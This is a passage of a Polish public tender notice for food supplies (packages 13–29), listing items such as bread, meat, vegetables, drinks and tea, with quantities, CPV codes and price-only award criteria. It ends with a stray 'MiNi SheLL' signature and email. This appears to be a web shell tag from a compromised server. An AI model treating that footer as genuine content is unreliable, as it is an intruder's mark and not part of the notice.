<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet nr 13 Pieczywo zwykłe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chleb mieszany pszenno-żytni, bochenki po 700g (22 kromki)	szt.		12500
2	Bułka zwykła 50g	szt.		80000
3	Chleb razowy bez dodatku miodu i cukru, bochenki po 600g (20 kromek)	szt.		2500
4	Bułka tarta	kg		80,0
5	Drożdże	kg		10,0
6	Drożdżówka 80÷100 g	szt.		500
7	Baton pszenny 400 g	szt.		50
15612500-6;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet nr 14 Wędliny, mięso.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Szynka mielona wieprzowa	kg		5
2	Szynka wieprzowa got. ekstra wędzona	kg		50
3	Szynka wiejska	kg		5
4	Polędwica drobiowa (100% mięsa drobiowego)	kg		45
5	Kiełbasa drobiowa (diety) typu oławska, szynka	kg		75
6	Kiełbasa typu: krakowska, zielonogórska, żywiecka, szynka wp., szynka woł.	kg		5
7	Kiełbasa kminkowa	kg		10
8	Kiełbasa typu mielonka, pieczeń rzymska itp..	kg		10
9	Mortadela	kg		65
10	Boczek wędzony z żeberkami surowy	kg		75
11	Kiełbasa typu zwyczajna	kg		200
12	Baleron wieprzowy gotowany	kg		7
13	Parówki drobiowe	kg		50
14	Kiełbaski typu senatorskie drobiowe	kg		150
15	Karczek wp. z kością	kg		200
16	Boczek wp. z kością	kg		5
17	Łopatka z kością	kg		350
18	Schab wp. z kością	kg		750
19	Łopatka wp. b/k	kg		125
20	Mięso wp.-woł. Mielone	kg		50
21	Wołowina gulaszowa	kg		600
22	Wieprzowina gulaszowa	kg		250
23	Wątroba wieprzowa	kg		50
24	Słonina	kg		2,5
25	Kości wieprzowe wędzone	kg		50
26	Smalec wieprzowy paczkowany 250g	kg		2,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 15.11.90.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 15 Lody.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Lody różne smaki ~ 90 ml typu: Koral, Zielona Budka, Algida i inne	szt.		150
2	Lody różne smaki ~ 110 ml typu: Koral, Zielona Budka, Algida i inne	szt.		150
3	Lody różne smaki ~ 220 ml typu: Koral, Zielona Budka, Algida i inne	szt.		80
4	Lody różne smaki ~ 300 ml typu: Koral, Zielona Budka, Algida i inne	szt.		38
5	Rolady lodowe ~1000 ml	szt.		7
6	Torty lodowe ~1000 ml	szt.		7
15.55.50.00-3;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.55.50.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet nr 16 Wyroby piekarnicze - obwarzanki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Obwarzanki, Precle typu krakowskie (z makiem, z sezamem, z solą) 100g	szt.		5500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.25.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet nr 17 Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Aronia mrożona	kg		25
2	Truskawka mrożona	kg		150
3	Brokuły mrożone	kg		750
4	Szpinak rozdrobniony mrożony	kg		25
5	Fasolka szparagowa mrożona	kg		125
6	Brukselka mrożona	kg		125
7	Marchewka mrożona kostka	kg		125
8	Groszek zielony mrożony	kg		75
9	Papryka czerwona mrożona	kg		50
10	Mieszanka kompotowa	kg		25
11	Włoszczyzna 3 - składnikowa paski mrożona: marchew, pietruszka, seler	kg		500
12	Mieszanka warzywna            5 - składnikowa mrożona	kg		10
13	Frytka MR. op. 2,5kg	kg		250
14	Flaki MR. Blanszowane op. 900g	kg		25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet nr 18 Żurek w płynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Żurek w płynie opak. 0,5L	szt.		250
15800000-6;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet nr 19 Wędliny paczkowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Wędliny wysokogatunkowe paczkowane typu szynka extra, baleron, polędwica sopocka    100g-150g	kg		50
2	Wędliny wysokogatunkowe paczkowane podsuszane typu kabanos, myśliwska 100g - 150g	kg		23
15131130-5;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet nr 20 Przetwory warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Koncentrat pomidorowy 30% op. ~4500÷4800g	szt.		5
2	Koncentrat pomidorowy 30% op. ~3200÷3300g	szt.		3
3	Koncentrat pomidorowy 30% op. 1 kg	szt.		50
4	Koncentrat pomidorowy 30% op. 400g	szt.		25
5	Koncentrat pomidorowy 30% op. 200g	szt.		100
6	Koncentrat pomidorowy 30% op. 70g	szt.		75
7	Groszek zielony konserwowy 400g	szt.		50
8	Kukurydza konserwowa 400g	szt.		125
9	Kukurydza konserwowa 2650g	szt.		2
10	Papryka konserwowa cała ~900g	szt.		100
11	Papryka konserwowa ćwiartki ~720g	szt.		50
12	Papryka konserwowa  ~500g	szt.		25
13	Papryka konserwowa  ~300g	szt.		25
14	Ogórek konserwowy 1 l	szt.		125
15	Fasolka konserwowa zielona ~720g	szt.		20
16	Fasolka konserwowa zielona ~520g	szt.		10
17	Fasolka konserwowa czerwona ~400g	szt.		15
18	Chrzan tarty na kwasku cytr. ~180g	szt.		50
19	Musztarda chrzanowa ~190g	szt.		50
20	Musztarda stołowa ~500g	szt.		10
21	Majonez wyborowy ~250g	szt.		80
22	Sok Bobofrut b/c 175 ml	szt.		600
23	Powidła śliwkowe ~300g	szt.		25
24	Dżem ~280÷330g	szt.		50
25	Dżem opakowanie 25g	szt.		2500
26	Miód pszczeli naturalny opakowanie 25g	szt.		2500
27	Miód pszczeli naturalny ~200g	szt.		13
28	Miód pszczeli naturalny ~400g	szt.		5
29	Miód sztuczny ~320g	szt.		10
30	Pasztet drobiowy ~130÷160g	szt.		75
31	Pasztet drobiowy 50g	szt.		2500
32	Ketchup 250g	szt.		50
33	Majonez wyborowy ~720g	szt.		15
34	Majonez wyborowy ~280g	szt.		100
35	Pieczarki marynowane ~310g	szt.		40
36	Oliwki ciemne b/pestek ~140g	szt.		3
37	Oliwki zielone faszerowane papryką ~140g	szt.		3
38	Seler konserwowy ~300g	szt.		30
39	Koncentrat barszczu czerwonego ~330ml	szt.		5
40	Tuńczyk w sosie własnym ~170g	szt.		80
41	Ananas poj. ~565g	szt.		8
42	Brzoskwinia poj. ~850g	szt.		7
15897200-4,  15800000-6;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.72.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet nr 21 art. sypkie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mąka ziemniaczana	kg		5,0
2	Cukier	kg		2000,0
3	Cukier puder	kg		10,0
4	Herbata granulowana	kg		150,0
5	Kawa zbożowa Kujawianka	kg		250,0
6	Kleik ryżowy opak. 170g	szt.		300
7	Kaszka mleczno-ryżowa opak. 230÷250g	szt.		200
8	Kaszka bezmleczna owocowa opak. 230÷250g	szt.		5
9	Budyń bez cukru ~41g	szt.		200
10	Galaretka owocowa ~80g	szt.		100
11	Kisiel bez cukru opak. 45g	szt.		200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet nr 22 Herbata.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Herbata expresowa  Lipton Yellow op. 100 torebek x 2g	op.		13
2	Herbata expresowa  Lipton  op. 25 torebek x 2g 	op.		50
15863000-5; 
3	Lipton owocowe exp. 20 torebek	op.		13
4	Saga exp. 20 torebek	op.		90
5	Saga owoc. Exp. 25 torebek	op.		90
6	Herbaty exp. typu Dilmah  w kopertach różne smaki	szt.		315
7	Herbata exp. 20 torebek typu Minutka, Posti	op.		40
8	Herbata exp. typu grzaniec 10 torebek	op.		6
9	Herbata owoc. Vitax exp. ~20 ÷ 25 torebek	op.		6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.86.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet nr 23 Warzywa różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Marchew korzeń	kg		1500
2	Burak czerwony	kg		950
3	Pietruszka korzeń	kg		450
4	Seler korzeń	kg		780
5	Kapusta biała (główka)	kg		400
6	Kapusta czerwona (główka)	kg		350
7	Kapusta pekińska (główka)	kg		50
8	Kapusta brukselka	kg		80
9	Cebula zaschnięta	kg		300
10	Czosnek krajowy, średnica ok.. 3cm	szt.		100
11	Pietruszka zielona: okres letni, pęczek nie mniej niż 100g	szt.		700
12	Pietruszka zielona: okres zimowy, pęczek nie mniej niż 50g	szt.		100
13	Koperek: okres letni, pęczek nie mniej niż 70g	szt.		1000
14	Koperek: okres zimowy, pęczek nie mniej niż 35g	szt.		200
15	Por wczesny ok. 150÷200g sztuka	szt.		25
16	Marchew młoda obcinana	kg		1000
17	Seler z nacią pęczki	szt.		200
18	Seler obcinany młody	kg		250
19	Buraki młode	kg		1000
20	Por 	kg		20
21	Kapusta biała wczesna średnica ~15 cm	szt.		150
22	Kapusta czerwona wczesna średnica ~15 cm	szt.		80
23	Cebula młoda (nie zaschnięta	kg		150
24	Pomidory	kg		300
25	Ogórek zielony świeży	kg		150
26	Ogórek szklarniowy	kg		25
27	Papryka żółta, zielona	kg		30
28	Papryka czerwona	kg		70
29	Kabaczek/cukinia	kg		150
30	Kalafior średnica ~15 cm	szt.		300
31	Brokuły średnica ~15 cm	szt.		250
32	Fasolka szparagowa	kg		100
33	Botwina pęczek ok. 5 szt.	p.		150
34	Kalarepka średnica 7÷8 cm	szt.		50
35	Fasolka szparagowa zielona	kg		150
36	Rzodkiewka, pęczek nie mniej niż 10 szt.	szt.		400
37	Sałata zielona główka	szt.		250
38	Szczypiorek, pęczek nie mniej niż 70g	szt.		25
39	Ogórek kiszony	kg		450
40	Kapusta kiszona	kg		600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.40-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet nr 24 Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Ziemniaki jadalne późne workowane 25 kg	kg		10000
2	Ziemniaki jadalne wczesne workowane 25 kg	kg		13000
15310000-4;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Pakiet nr 25 Drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kura mięsna	kg		500,0
2	Kurczęta bez podrobów	kg		800,0
3	Porcja rosołowa	kg		250,0
4	Ćwiartka z kurczaka	kg		1000,0
5	Filet z kurczaka św.	kg		500,0
6	Filet z indyka św.	kg		5,0
7	Wątróbka drobiowa	kg		150,0
8	Podudzie trybowane z indyka	kg		600,0
15112100-7;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Pakiet nr 26 Wyroby garmażeryjne gotowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Udko z rożna	kg		10
2	Kiełbasa z grila	kg		8
3	Galareta wieprzowa. z czosnkiem 300g	szt.		15
4	Galareta wieprzowa 300g	szt.		15
5	Galareta drobiowa 300g	szt.		15
6	Placek ziemniaczany po węgiersku 	szt.		25
7	Szaszłyk wieprzowy 	kg		5
8	Szaszłyk drobiowy 	kg		5
9	Żeberka z/k z kapustą	kg		5
10	Żeberka wieprzowe	kg		5
11	Stek z cebulką 	kg		5
12	Golonko delikatesowe 	kg		5
13	Golonko z kapustą	kg		3
14	Schab po zbójnicku	kg		3
15	Filet z grila	kg		2
16	Schab drobiowy z majerankiem	kg		2
15130000-8;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Pakiet nr 27 Pieczywo - bar.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Bułka z ziarnami 70g 	szt.		250
2	Bułka pszenna 100g	szt.		2600
3	 Paluch 70g-80g z ziarnem, z ziołami	szt.		650
4	Bułka sojowa 80g	szt.		250
5	Bułka grahamka 80g	szt.		650
6	Bułka kajzerka 60g	szt.		2600
7	Bułka razowa z dynią 80g	szt.		1350
15810000-9;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Pakiet nr 28 Woda, napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Cisowianka woda 0,5 l gaz	szt.		750
2	Cisowianka woda 0,5 l n/g	szt.		750
3	Cisowianka woda sport 0,7 l	szt.		800
4	Cisowianka woda 1,5 l gaz	szt.		375
5	Cisowianka woda 1,5 l n/g	szt.		750
6	Nałęczowianka woda smakowa 1,5 l n/g	szt.		250
7	Woda Nałęczowianka gaz.  0,5 l	szt.		750
8	Woda Nałęczowianka n/g  0,5 l	szt.		750
9	Woda Nałęczowianka n/g  1,5 l	szt.		750
10	Woda Nałęczowianka gaz.  1,5 l	szt.		375
11	Woda Nałęczow. Sprint  n/g    0,75 l	szt.		625
12	Woda Muszynianka  1,5 l	szt.		750
13	Woda Muszynianka 0,6 l	szt.		500
14	Woda Żywiec n/g  1,5 l	szt.		250
15	Woda Żywiec gaz.  1,5 l	szt.		250
16	Żywiec woda smakowa n/g  1,5 l	szt.		200
17	Ustronianka woda gaz 1,5l	szt.		250
18	Ustronianka woda n/g 1,5l	szt.		375
19	Ustronianka z jodem 1,5 l	szt.		90
20	Woda źródlana 5 l	szt.		12
21	Woda Nestle Aquarel 0,5 l gaz	szt.		75
22	Woda Dąbrowianka 0,5 l n/g	szt.		125
23	Woda Dąbrowianka 1,5 l n/g	szt.		125
24	Woda Dąbrowianka 1,5 l gaz	szt.		75
25	Woda Staropolanka 1,5 l gaz	szt.		125
26	Woda Staropolanka 1,5 l n/g	szt.		125
27	Woda Staropolanka 0,5 l n/g sport cap	szt.		125
28	Woda Staropolanka 0,5 l smakowa	szt.		125
29	Napój energetyzujący 1 l	szt.		50
30	Napój energetyzujący 0,25 l puszka	szt.		25
31	Napoje owocowe różne smaki 0,5 l	szt.		25
32	Napoje w kartonach 0,2 l	szt.		25
33	Napoje owocowe różne smaki 1,5 l	szt.		40
34	Napoje typu oranżada różne smaki 1,5 l	szt.		40
35	Napoje różne smaki 2 l	szt.		25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8, 15.98.14.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Pakiet nr 29 Woda typu Jurajska, napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jura Sport n/g  0,5 l	szt.		375
2	Woda Jurajska gaz.  1,5 l	szt.		375
3	Woda Jurajska n/g  1,5 l	szt.		500
4	Woda Jurajska gaz  0,5 l	szt.		375
5	Woda Jurajska n/g 0,5 l	szt.		500
6	Woda Jurajska lekko-gazowana  1,5 l	szt.		250
7	Woda Jurajska gaz  0,5 l ze smakiem Limonki, Pomarańczy, Jabłka, Truskawki	szt.		250
8	Woda Jurajska gaz  1,5 l ze smakiem Limonki, Pomarańczy, Jabłka, Cytryny, Truskawki	szt.		250
9	Woda Jurajska n/g  0,5 l ze smakiem Poziomki, Cytryny, Grapefruit	szt.		375
10	Woda Jurajska n/g  1,5 l ze smakiem Poziomki, Cytryny, Grapefruit, Truskawki	szt.		250
11	Frutek Aqua n/g smakowy 0,5 l	szt.		25
12	Napoje Frutek 0,33 l z zamknięciem typu sport-cap	szt.		25
13	Jurajska napoje gazowane 0,5 l różne smaki	szt.		250
14	Jurajska napoje gazowane 1,5 l różne smaki	szt.		250
15	Tonik 0,5 l różne smaki	szt.		250
16	Tonik 1,5 l różne smaki	szt.		375
17	Napoje niegazowane z ekstraktem Herbaty Ice Tea 0,5 l	szt.		125
18	Napoje niegazowane z ekstraktem Herbaty Ice Tea 1,5 l	szt.		90
19	Cola 2 l	szt.		125.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.10.00-8, 15.98.14.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com